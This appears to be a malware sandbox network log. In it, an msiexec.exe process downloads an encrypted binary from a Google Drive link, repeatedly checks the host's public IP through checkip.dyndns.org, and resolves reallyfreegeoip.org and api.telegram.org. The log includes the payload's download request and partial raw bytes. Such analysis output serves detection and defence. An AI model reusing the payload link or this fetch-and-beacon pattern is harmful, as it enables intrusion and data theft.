Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:38.113631010 CEST	1.1.1.1	192.168.2.5	0x1dc1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:40.382668018 CEST	1.1.1.1	192.168.2.5	0xf2ad	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:40.382668018 CEST	1.1.1.1	192.168.2.5	0xf2ad	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 03:32:51.583779097 CEST	1.1.1.1	192.168.2.5	0x70ea	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49864	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:38.122438908 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:38.713556051 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 16774d06377dd22722f0d40a11a124b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 03:32:38.718175888 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 03:32:40.103478909 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:40 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e11ec9c629771debda616ea60ad33617 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 03:32:41.017138958 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 03:32:41.195625067 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:41 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d827fc5059c151b27dcd30160d79ae95 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49892	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:41.826021910 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 03:32:43.414864063 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:43 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e9beaa4e6d142f5b25452cf36d8d0ce6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49909	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:44.021061897 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:44.628424883 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eb187862f4e664e8d31ca6d97765cec4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49916	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:45.257210016 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:45.817893028 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 10ea7ebe0f728bcec3128dc1611c1b7a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49927	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:46.425205946 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:47.008312941 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 40d896017d859ad5b13be313f6e81946 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49936	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:47.617928028 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:48.179914951 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:48 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fdc2d5fee3237284b6019e1ada7f0ee2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49945	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:48.825970888 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:49.386369944 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e8eb81684ec07ea11f9dcd9d222ef817 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49956	158.101.44.242	80	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:32:50.182240963 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 03:32:50.928838968 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:50 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0388157882d5ca8deca7488a682518ab Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49828	216.58.206.46	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:33 UTC	216	OUT	GET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-10-08 01:32:34 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 08 Oct 2024 01:32:33 GMT Location: https://drive.usercontent.google.com/download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-JZ0f4AgRcF4v0WuY9oSCeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49838	216.58.206.65	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:34 UTC	258	OUT	GET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-08 01:32:37 UTC	4897	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="mUXDFpAccA156.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275520 Last-Modified: Mon, 07 Oct 2024 14:14:22 GMT X-GUploader-UploadID: AHmUCY1M2kxoe3KWMvcQn5Xr47ynSryIPdsfXDlcG2_YIg2dCVw9SJC1qL6rwMWx9P6uVFOJHT8SR6rF6w Date: Tue, 08 Oct 2024 01:32:37 GMT Expires: Tue, 08 Oct 2024 01:32:37 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=SD0nKw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-08 01:32:37 UTC	4897	IN	Data Raw: 9a a0 08 bf 98 7c b6 95 1a 9c 29 e5 14 ba 99 87 5a b2 c9 c6 1a 68 c7 bf df 7e b3 e3 a4 52 76 2a 22 9b 46 5c 33 fd 6b 4f 8a 36 44 8a 47 11 de fe 8d 4a 3c e0 ff 9d 71 cc c2 11 c7 c0 24 dd 91 09 7c 09 e5 f0 53 f9 db 59 a8 6e 47 f1 af 5e e8 18 ef 66 2f 8e 75 d7 68 f4 d0 90 9b af 97 d5 72 9a 06 40 a4 d0 35 e1 97 fc e8 a9 2f 74 f4 3f cc 6c b0 c6 83 54 c1 ee 90 0c be 31 33 ec b9 d5 ff f1 08 e8 f9 69 75 c9 ea 9a bd f4 4c 86 60 77 8d 17 a4 53 e7 f4 45 dc 60 cf 38 fe e8 8f 31 09 ae 92 d3 60 7a 5b c4 dd 7c 56 7f e7 a3 30 db d9 1a 0a d7 c8 47 87 e6 5a f3 65 87 36 6e d5 cb 72 e4 cf 95 32 3d ae 34 ce 4f ca 04 16 c3 a3 63 25 fd e7 ac ba 75 26 83 36 af 21 df fd ba d6 c0 aa 98 1f 86 2b d0 c1 e0 bf 5e 77 47 f8 88 f3 73 56 69 89 c4 71 0d b2 bf 19 4c ba 4d 26 d4 b8 b6 23 6d Data Ascii: \|)Zh~Rv*"F\3kO6DGJ<q$\|SYnG^f/uhr@5/t?lT13iuL`wSE`81`z[\|V0GZe6nr2=4Oc%u&6!+^wGsViqLM&#m
2024-10-08 01:32:37 UTC	4897	IN	Data Raw: da 44 ba 7c 28 6b 3f e6 c4 b1 66 bd 7e 0b 16 00 be e8 3b 71 38 74 d5 0e 52 b0 34 54 85 b1 69 01 f8 10 e2 d4 70 cf 94 1a 64 b7 0f db cd cf 36 c6 99 8d 35 41 52 a0 c2 b7 91 8f 2d 0f 0e 62 d9 60 04 e6 d2 d2 fb b0 ac 74 de c3 ce ba c2 33 a0 37 3a e9 59 9e 3c b2 aa f7 11 cf 51 40 7a ad 0f af b5 81 7d 71 d0 3e 26 4c 14 08 cc 15 98 b3 6c 3d c3 b0 ae ff a7 89 be 58 da cd f4 3b 6d a8 ea d1 d0 f1 52 b2 0b ae f3 ad 4a 61 08 7e 32 e4 1b 50 65 15 56 f3 56 4e ad 33 0a 55 34 bd 81 d5 71 92 38 77 06 9f 02 b2 19 c4 7d 65 aa 3a 44 16 cd fb 2a eb 69 f6 d4 7a 31 a6 8a 51 d9 52 cb 9e b8 ed 56 74 61 94 4f 04 23 18 aa 2a 16 9e 7b 7a e0 ea 73 7b 62 03 53 e8 12 a6 ea 2c cc 81 af 58 1f 2f ad aa 5b 33 61 61 c1 f5 0e 4c db 97 04 8e b3 68 b4 75 1e cc 07 c4 4a 6e 4c 98 da 07 d4 96 b5 Data Ascii: D\|(k?f~;q8tR4Tipd65AR-b`t37:Y<Q@z}q>&Ll=X;mRJa~2PeVVN3U4q8w}e:Diz1QRVtaO#{zs{bS,X/[3aaLhuJnL
2024-10-08 01:32:37 UTC	6	IN	Data Raw: 7f 82 fb eb 5f 9c Data Ascii: _
2024-10-08 01:32:37 UTC	1325	IN	Data Raw: f4 01 10 e8 d9 fa e5 ec dc 86 56 d2 da 28 eb 0e 32 8d 7b fe 4f e0 a9 00 49 35 0d 72 84 b8 9a e9 af e3 c8 db e9 31 2d 44 14 b5 89 f1 e7 bc 1e 5f c1 f5 be 46 a5 1a 0f a6 b5 0a 71 55 4e 68 ab 99 e8 74 3a fb d3 82 b3 a9 39 53 ae 6d 3e ce d5 ff 03 5d d7 f0 8c d7 36 99 04 4b 00 47 dc 9b e1 db de 26 71 8d 21 db 3d fc 6b 9a 0e 7d a4 0c 51 89 bc 82 72 71 c4 ec 07 00 9e 4b b9 ec 57 7e 29 34 73 9d e2 83 48 6f db db 5d ca 64 f1 04 fb 47 a0 be a3 4d f5 fe 35 65 f0 91 0e 9c 44 3a 8f 24 a2 1d 3b fa 59 2d cc a4 69 d4 d5 4d 6a 25 9a 1f 91 89 17 60 0c 6d 09 63 d6 05 e9 83 be cb 3c f0 33 32 c2 5b 5b 5c d5 a0 96 ac 2d 49 27 ac f3 2a 18 f9 e8 a9 51 22 82 9c 20 c1 b8 c7 fe 9c 9e b9 2b 73 eb 0e 6c 57 9d f0 5e 3c c7 37 ce fb 4f 9b 99 c8 99 7f 4b 2f 21 44 db a1 15 0c 7a e4 2f 83 Data Ascii: V(2{OI5r1-D_FqUNht:9Sm>]6KG&q!=k}QrqKW~)4sHo]dGM5eD:$;Y-iMj%`mc<32[[\-I'*Q" +slW^<7OK/!Dz/
2024-10-08 01:32:37 UTC	1390	IN	Data Raw: 1f e8 cc e5 65 f4 fb 3c 28 69 5f 81 9c 31 5e 7a aa 31 05 b9 52 30 eb 0e fc 1f f9 1f 97 4a cc 6b 4a 25 d2 a7 c0 7e 78 fa d9 df f4 aa 0b 8b 32 ad ab e4 da ba 03 be c4 26 8b b4 91 9a 6b 80 4f fe ba e5 4a de 4a c5 84 6b 56 70 87 95 7a d6 cb 72 47 ea 4d 4b b8 a2 c5 67 82 0d 6c 10 0c 51 53 6f 4e 3f c0 92 e2 f1 89 42 aa c0 df e9 76 5f 35 ab 9c b5 4a 82 e6 7d d0 16 2a dd 48 9f b2 1c d9 c1 b5 11 87 4e c1 cf be 99 94 97 85 54 a5 82 4a f3 25 98 3d a6 6a 3c 71 5c 8a 70 2a 2a cd 7a f8 76 cd 4c de 36 6f ea 16 e6 a3 a7 dd d5 f4 e6 cc 0c 68 c1 3e db 95 d2 ac b2 cf 51 9f c7 b7 61 7c 4e 26 a3 b9 7e 18 7a 50 eb fb 7a 8c 6a 5c 24 41 c3 1d bc 5d 80 60 86 84 b4 89 ee 38 6f ce 96 de a8 58 6f 51 02 b1 46 30 f7 5d 46 28 7b 16 0a f5 e5 78 3f 04 bd a0 db 13 11 97 52 d7 21 10 ba b1 Data Ascii: e<(i_1^z1R0JkJ%~x2&kOJJkVpzrGMKglQSoN?Bv_5J}HNTJ%=j<q\p*zvL6oh>Qa\|N&~zPzj\$A]`8oXoQF0]F({x?R!
2024-10-08 01:32:37 UTC	1390	IN	Data Raw: 4d 50 a0 7c cb 4c b7 de e1 2c 4a 57 a6 32 a6 ed ff 5e 81 dd 11 6f 53 2f 68 9d be 86 52 47 6b f5 cf 4c 4e 2b eb fb 26 94 76 ca 5e 79 2e 3f 53 78 81 62 60 9b 90 88 16 62 5f ea 89 7c dc 22 c6 06 6c 58 03 53 3f f4 49 d8 48 67 de d3 4c 95 87 b4 59 e6 b7 68 86 c3 25 6b bb fa c2 6e e6 1e fb c9 3d b6 50 e8 7e fe e7 f3 be 8b ab eb 45 d1 82 2d a0 2d 1d a6 c0 f2 06 b7 15 98 fe 66 3a 1c 44 31 03 ea 7a 0a 85 1e 31 b0 d7 88 80 03 00 3c ef 43 50 d8 64 f9 db 53 bf 64 47 d9 32 a1 e8 12 89 66 2f 8e 75 a9 5d f4 90 94 e9 f8 95 d5 02 8c 2e c1 a4 d0 3f f7 69 fd fb a2 3e 7f cd f4 cd 6c b0 b8 a8 54 c1 ea b8 e7 be 31 39 ff 35 ab c9 f1 06 f3 31 bd 65 7d 93 41 b4 cd 4d ca a7 40 27 7e de 2d d6 89 0e 6a 07 bd 59 85 e0 9a 50 67 ca fd 87 40 14 3e e4 87 7e 38 5f 84 cd 6e b4 96 49 2e 92 Data Ascii: MP\|L,JW2^oS/hRGkLN+&v^y.?Sxb`b_\|"lXS?IHgLYh%kn=P~E--f:D1z1<CPdSdG2f/u].?i>lT1951e}AM@'~-jYPg@>~8_nI.
2024-10-08 01:32:37 UTC	1390	IN	Data Raw: 35 3a 08 ab 97 03 72 38 04 c9 26 0f 6e 24 7b bb 7b 68 0a f5 3a c9 d5 58 ad 80 ca 3b 69 0f da cf e2 36 87 df ff cf 4c 52 d0 d5 60 92 8f 2d 39 2a 74 a7 b5 05 e6 d6 f4 ff b0 ac 72 b1 7a ce b8 c8 41 70 8e 3b 99 71 de 3c b2 a0 41 5b cf 51 4a 52 e7 0f af bf ff 62 71 d0 3a 0e 07 14 08 c6 60 8d a7 78 cd 78 b0 ae e5 d3 0a be 1d db c1 f5 28 2f 93 fa 60 a0 9e e9 a1 0b a4 e2 a5 34 0b 6b 7e 36 90 53 57 4d 4b 25 4f 5c 4d c8 00 b7 55 3e d8 e5 fd 2b 98 38 7a 04 02 cf ed 19 c5 59 1c bd fe 50 1c bd 5e 08 93 27 42 d4 70 3c 6b c8 49 ab 6e ab f6 c8 4f 79 61 1f df 26 04 27 b0 9c 34 64 d5 70 72 87 3b 3c 60 1c 15 40 ed 16 d8 01 5f a7 8b 0d 77 10 5b 4c bf 59 2c af 49 b4 ff 0e 98 ba cb 15 88 95 6d ad 7a ff a4 6d ab fe 6e 90 83 de 68 b1 f9 0a 9f 43 80 b9 c6 e8 0e 47 36 e2 0d 2a 0f Data Ascii: 5:r8&n${{h:X;i6LR`-9trzAp;q<A[QJRbq:`xx(/`4k~6SWMK%O\MU>+8zYP^'Bp<kInOya&'4dpr;<`@_w[LY,ImzmnhCG6
2024-10-08 01:32:37 UTC	1390	IN	Data Raw: 75 e2 e7 db 2b de 1d 8b 06 05 e6 3c 51 f5 94 36 5a 06 ce 9e 55 10 82 b6 d1 b7 57 7f 06 4d c6 e8 e9 89 38 56 92 c6 d0 8c c6 d4 12 a0 14 d2 a2 a8 ef a0 44 62 e6 c9 25 7e b4 0e 98 aa 3a 72 0e 2d 84 6f 8f e9 b9 b5 c9 cf 3f ae 96 bf 75 41 f6 03 7b f1 8f 2c 78 a9 0a ff f1 f8 79 19 9c e3 7f da 73 9f fe fd df 34 89 3f 54 d5 b9 f3 50 ba a2 cd 81 e5 26 f1 5f 82 e4 a8 a6 eb f0 af c9 89 5f ec 59 6e 5d 4f ce 03 bd c7 3d d7 f3 c3 18 9f c2 f8 0b 78 23 30 49 e4 87 df 0c 70 9c 5f 91 e2 33 bd cf a3 25 0a 19 ac dc 4c c4 ea 17 86 31 63 1a cc 5f 91 25 48 c8 86 68 60 3d 35 94 41 d1 ec 7b 74 cb 4a 80 7f ca 85 c4 81 2b aa 28 55 3f 51 1f 50 8c b2 d6 c6 dd 5b 31 e1 52 b7 46 08 3a c2 a2 7f 3a 5a 4f f5 f7 7c 84 8b aa 04 95 07 02 93 17 9d 0c 94 09 9b 8f d4 7b 1c a4 0f ac 94 1c 86 c4 Data Ascii: u+<Q6ZUWM8VDb%~:r-o?uA{,xys4?TP&__Yn]O=x#0Ip_3%L1c_%Hh`=5A{tJ+(U?QP[1RF::ZO\|{
